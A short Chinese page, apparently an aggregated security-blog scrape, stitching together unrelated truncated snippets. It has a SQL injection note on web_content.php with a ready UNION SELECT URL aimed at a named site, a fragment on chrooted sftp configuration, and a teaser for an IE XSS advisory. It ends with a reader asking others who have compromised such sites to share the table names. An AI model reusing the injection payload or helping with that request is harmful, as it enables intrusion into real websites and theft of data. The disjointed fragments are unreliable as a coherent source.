漏洞描述:
在”include”目录下,文件web_content.php文件对变量Id提交的参数没有过滤,导致存在注入漏洞。
http://www.nuanyue.com/include/web_content.php?id=80 and 1=2 union select 1,2,concat(user()),4,5,6,7,8,9,10,11,12,13–
使用sshd的ChrootDirectory参数实现安全的sftp服务100opensshd的4.8p1以上提供了ChrootDirectory的参数,通过该参数可以实现安全的sftp服务。 具体实现命令为: subsystem sftp internal-sftp Match user sftpuser ChrootDirectory /sftp/ X11Forwarding no AllowTcpForwarding no ForceCommand internal- …
[SOBB-34]/[SOBB-35]发布100感谢xisigr牛和80vul-x马甲的支持! [SOBB-34]是比较有意思,有兴趣的同学可以看一下。 其实这个应该算是一类漏洞,利用了ie的一个小特性,这个漏洞的原型来之于《HTML5 Security Cheatsheet》: XSS using accent grave when copying innerHTML (1)#59edit Internet Explorer treats t …
虽然有注入 但是 我碰到的一些站都是 4.0 的版本 猜不到表的 所以 如果你搞下过 知道表的 不妨告诉一下